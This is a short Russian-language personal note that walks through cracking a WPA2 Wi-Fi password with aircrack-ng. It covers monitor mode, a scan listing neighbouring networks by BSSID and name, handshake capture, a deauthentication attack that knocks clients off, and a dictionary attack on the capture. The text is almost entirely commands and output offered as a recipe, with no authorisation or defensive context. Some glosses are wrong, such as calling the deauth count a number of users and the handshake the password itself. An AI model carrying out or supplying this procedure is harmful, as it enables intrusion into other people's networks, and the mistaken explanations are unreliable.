Aircrak-NG

Created Wednesday 17 July 2024

1. Узнать интерфейс:

$ ifconfig -a

wlan0

Просто посмотреть список своих сетевых устройств: # airmon-ng

2.Перевести в режим мониторинга:

# airmon-ng  start wlan0

PS: usage: airmon-ng <start|stop|check> <interface> [channel or frequency]

$ sudo ifconfig wlp8s0 down  выключить карту

$ sudo ifconfig wlp8s0 up       включить

3.Название интерфейса изменится ..узнаем:

# ifconfig

wlan0mon

..видим название интерфейса мониторинга

4. Что мы имеем?

# airodump-ng wlan0mon 

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID


 BC:FD:0C:98:46:F5  -82       33        0    0   6   65   WPA2 CCMP   PSK  70mai_d06_46f5                              

 24:CF:24:52:9A:1A  -86        3          0    0   6  270   WPA2 CCMP   PSK  Tymanolog                                   

 0C:80:63:C0:5C:1C   -1        0          0    0   1   -1                    <length:  0>                                

 50:FF:20:A0:EB:98  -88        4          0    0   8  270   WPA2 CCMP   PSK  Ulubkus                                     

 52:FF:20:F0:EB:98  -89       30         0    0   8  270   WPA2 CCMP   PSK  <length:  0>                                

 44:94:FC:86:E1:40   -1        0           10    0  13   -1   WPA              <length:  0>                                

 74:9D:79:D4:6B:78  -87       78         0    0   4  130   WPA2 CCMP   PSK  RT-WiFi-6B76                                

 D4:6E:0E:53:0A:4E  -89       56        10    0  11  270   WPA2 CCMP   PSK  zolnarg                                     

 5E:E9:31:26:74:65  -88       57          0    0   9  540   WPA2 CCMP   PSK  <length:  0>                                

 34:0A:33:17:15:34  -89       74           0    0  13  270   WPA2 CCMP   PSK  DIR-806A-1532                               

 28:6C:07:46:B8:D4  -85       91          0    0   1  130   WPA2 CCMP   PSK  ShishkinLes                                 

 C8:D3:A3:E8:AF:C9  -89       67        0    0  11   65   OPN              DSL-2640U                                   

 5C:E9:31:36:74:65  -87       66           7    0   9  540   WPA2 CCMP   PSK  Oksana                                      

 F4:EC:38:AC:23:C4  -87        1         23    0   9  270   WPA2 CCMP   PSK  asm    

.................................................................................

5. Выбираем, что надо:

# airodump-ng  --bssid 08:86:30:74 :22:76 -c 6 -w  WPAcrack  wlan0mon 

bssid 08:86:30:74 :22:76  BSSID

-c 6  канал

WPAcrack  файл в который запишется "handshake"

wlan0mon  адаптер в режиме мониторинга

Весь фокус в том что-бы клиент переслал на точку доступа пароль и его перехватить,

можно долго сидеть в засаде и ждать, но быстрее отключить клиента, что бы он пересоединился

по новой, поэтому:

# aireplay-ng  --deauth 100  -a 08:86:30:74:22:76 wlan0mon

100  количество пользователей

bssid 08:86:30:74 :22:76  BSSID

wlan0mon  адаптер в режиме мониторинга

Возвращаемся к терминалу с  airodump-ng и видим "Handshake WPA" , то есть пароль захвачен

и помещен в файл  WPAcrack-01.cap

 6. подбираем пароль:

# aircrack-ng WPAcrack-01.cap -w /usr/share/sqlmap/txt/wordlist.txt 


WPAcrack-01.cap   файл где записан handshake

usr/share/sqlmap/txt/wordlist.txt   путь к базе паролей